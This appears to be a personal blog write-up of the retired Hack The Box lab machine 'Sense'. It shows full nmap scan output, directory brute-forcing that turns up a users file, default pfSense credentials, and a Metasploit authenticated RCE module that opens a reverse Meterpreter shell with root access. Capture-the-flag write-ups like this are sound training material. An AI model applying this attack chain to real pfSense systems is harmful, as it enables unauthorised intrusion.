Welcome to my write-up for Hack The Box – Sense (with metasploit).
This is my first write-up publish and it does not have much content as it was such an easy machine to complete, I have to say...
I just started to make notes for my machine/box completions for write-up publishing recently and I really started to enjoy doing it. The majority of the completed write-ups are still active machines. Which means I am unfortunately not allowed to upload the write-ups as of yet.
#Sadface
A little back story: I am a Freelance Creative, I do Photo- and Videography and started to get really interested and hands on in Cyber-Security in 2019.
I am an autodidact from the 80’s and I have never felt more passionate in learning something new like Cyber-Security, since I started creating images back in the early 2010's.. There is something refreshing learning something you always wanted to do which is also very far from the thing that you currently do.
I am active on HackTheBox and TryHackMe and I am aiming to give my shot at the OSCP exam before the end of this year.
Thank you for sticking through with me this far!
Without further a-do, here is my plain write-up for Sense a machine which can be found at https://app.hackthebox.eu/machines/Sense.
Sense was a Retired machine at the time of this writing.
What I have learned with this machine:
- Always check .txt files and source codes.
- Sometimes things are easier than you think..
- Injection :).
Here We Go!
First we start with some basic enumeration:
NMAP:
Starting Nmap 7.91 ( <https://nmap.org> ) at 2021-04-21 10:31 CEST
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:31
NSE Timing: About 40.91% done; ETC: 10:32 (0:00:48 remaining)
Completed NSE at 10:31, 34.95s elapsed
Initiating NSE at 10:31
Completed NSE at 10:31, 0.00s elapsed
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Initiating Ping Scan at 10:31
Scanning 10.10.10.60 [4 ports]
Completed Ping Scan at 10:31, 0.08s elapsed (1 total hosts)
Initiating Connect Scan at 10:31
Scanning sense.htb (10.10.10.60) [65535 ports]
Discovered open port 80/tcp on 10.10.10.60
Discovered open port 443/tcp on 10.10.10.60
Connect Scan Timing: About 19.74% done; ETC: 10:34 (0:02:06 remaining)
Connect Scan Timing: About 48.01% done; ETC: 10:33 (0:01:06 remaining)
Completed Connect Scan at 10:33, 104.52s elapsed (65535 total ports)
Initiating Service scan at 10:33
Scanning 2 services on sense.htb (10.10.10.60)
Completed Service scan at 10:33, 6.14s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against sense.htb (10.10.10.60)
Retrying OS detection (try #2) against sense.htb (10.10.10.60)
Initiating Traceroute at 10:33
Completed Traceroute at 10:33, 0.05s elapsed
Initiating Parallel DNS resolution of 1 host. at 10:33
Completed Parallel DNS resolution of 1 host. at 10:33, 0.04s elapsed
NSE: Script scanning 10.10.10.60.
Initiating NSE at 10:33
Completed NSE at 10:34, 70.88s elapsed
Initiating NSE at 10:34
Completed NSE at 10:35, 15.50s elapsed
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.034s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: lighttpd/1.4.35
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| lighttpd 1.4.35:
| CVE-2019-11072 7.5 <https://vulners.com/cve/CVE-2019-11072>
| CVE-2018-19052 5.0 <https://vulners.com/cve/CVE-2018-19052>
|_ CVE-2015-3200 5.0 <https://vulners.com/cve/CVE-2015-3200>
443/tcp open ssl/https?
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224>
| <http://www.cvedetails.com/cve/2014-0224>
|_ <http://www.openssl.org/news/secadv_20140605.txt>
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| Modulus Type: Non-safe prime
| Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ <https://weakdh.org>
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| References:
| <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566>
| <https://www.imperialviolet.org/2014/10/14/poodle.html>
| <https://www.securityfocus.com/bid/70574>
|_ <https://www.openssl.org/~bodo/ssl-poodle.pdf>
|_sslv2-drown:
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (86%), FreeBSD 8.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.0 cpe:/o:freebsd:freebsd:8.1
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.0 (86%), FreeBSD 8.1 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Apr 21 10:33:34 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Randomized
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 36.99 ms 10.10.14.1
2 34.12 ms sense.htb (10.10.10.60)
NSE: Script Post-scanning.
Initiating NSE at 10:35
Completed NSE at 10:35, 0.00s elapsed
Initiating NSE at 10:35
Completed NSE at 10:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 237.06 seconds
Raw packets sent: 91 (7.552KB) | Rcvd: 318 (75.152KBAt the same time I have DIRBUSTER running to bruteforce some directories:
DIRBUSTER gave us an interesting txt file called /system-users.txt, http://10.10.10.60/system-users.txt:
Sweet let us login! You can find the default credentials for pfsense online with some google-fu!
Now that we can see the version info and we have some login credentials, let us check msfconsole to see if we can get a hit.
❯ msfconsole ─╯
# cowsay++
____________
< metasploit >
------------
\\ ,__,
\\ (oo)____
(__) )\\
||--|| *
=[ metasploit v6.0.38-dev ]
+ -- --=[ 2118 exploits - 1138 auxiliary - 358 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: When in a module, use back to go
back to the top level prompt
msf6 > search pfsense
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense
1 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE
2 exploit/unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE
Interact with a module by name or index. For example info 2, use 2 or use exploit/unix/http/pfsense_group_member_execGoing through the website I can see some graph viewer like RDD Graph under the dropdown box called status.
So will use 1: 1 exploit/unix/http/pfsense_graph_injection_exec
We fill in our info that we have in options, incl the change of the USERNAME to Rohit, which we found in the .txt file before.
[*] Started reverse TCP handler on 10.10.14.15:4445
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39282 bytes) to 10.10.10.60
[+] Deleted nsh
[*] Meterpreter session 1 opened (10.10.14.15:4445 -> 10.10.10.60:45243) at 2021-04-21 11:01:53 +0200And for some reason we are root! The user and root flags are free for grabs at their regular locations!!
If you have any questions I will answer them as best as I can, when I can.
I hope you enjoyed this little write-up and I will see you on the next one!
Have a great day! ❤
Signing off,
Yours Truly
Get an email whenever n3pp13 publishes. https://n3pp13.medium.com/subscribe
